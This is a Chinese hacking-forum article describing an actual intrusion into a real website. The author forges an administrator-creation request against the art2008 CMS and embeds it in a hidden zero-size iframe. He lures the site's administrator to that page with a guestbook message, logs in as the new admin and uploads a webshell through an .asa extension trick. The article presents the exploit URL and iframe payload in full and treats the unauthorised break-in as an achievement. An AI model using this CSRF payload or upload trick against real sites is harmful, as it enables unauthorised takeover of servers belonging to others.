首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
一次基于CSRF下的攻击
来源:http://www.hackdemon.cn 作者:Demon 发布时间:2009-04-24  

anthor: Demon[S.C.T]
blog:http://www.hackdemon.cn

最近想测试一下用CSRF来搞一个站有多快? 于是乎就测试了一下,结果还是挺让人满意的。废话不多说了, 切入正题。 文章没技术含量,望高手别捧腹大笑 - -||
我从源码站里下了一套源码,名曰:art2008 我是从增加管理员这里进行CSRF的, 同过抓包 我发现,构造一个链接
如:

http://www.xxx.com/admin/admin_admin.asp?action=savenew&username=11111&PrUserName=11111&passwd=123456&passwd2=123456&sex=%CF%C8%C9%FA&fullname=%B9%FE%B9%FE&email=xss@qq.com&depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+[code]
就能够自动增加一个管理员, 于是乎测试了一下,发现可以增加。然后便开始找对象进行试验..

google了一下 , 找了个管理员经常上的网站进行了测试, 然后我先是在自己空间上建立了以个test.htm 代码如下:
[code]你喜欢包拯吗?

<iframe src="http://www.xxx(名字略).com/admin/admin_admin.asp?action=savenew& username=111111&PrUserName=111111&passwd=123456&passwd2=123456&sex=%CF%C8%C9%FA&fullname=%B9%FE%B9%FE&email=xss@qq.com&depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+" width="0" height="100"></iframe>

然后找到那个网站的留言板,开始留言,如图:
当管理员访问我的网站时候,他便被CSRF了。。 就在此后, 我便去玩CS了,战绩还不错- -
杀16死5.
当我回来时候,管理员已经回复了(- - ||真快阿)如图:

管理员应该访问了我的网站,于是我迅雷不及掩耳之势的跑去后台看看有没有成功增加,用户名:111111 密码:123456 结果成功登陆了!! 如图:

后台后个上传,改了一下扩展名asa ,马儿便飞到了服务器上, 如图:

大概计算了一下,一共花费了约30分钟左右的时间。
文章到这里就结束了,感谢大家观看,欢迎大家来论坛与小弟讨论,我的ID是:Demon


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·基于SQL触发器的服务器后门
·Linux 入侵踪迹隐藏攻略
·教你入侵RedHat Linux
·一次入侵+社工利用的过程
·入侵某官Game
·使用BackTrack3破解WEP实战
·Comersus Cart 购物系统漏洞分析
·入侵检测广东某大学网站
·php168 v2008后台拿shell方法
·利用XSS渗透DISCUZ 6.1.0实战
·帝国备份王拿shell
·修改封包拿WebShell
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved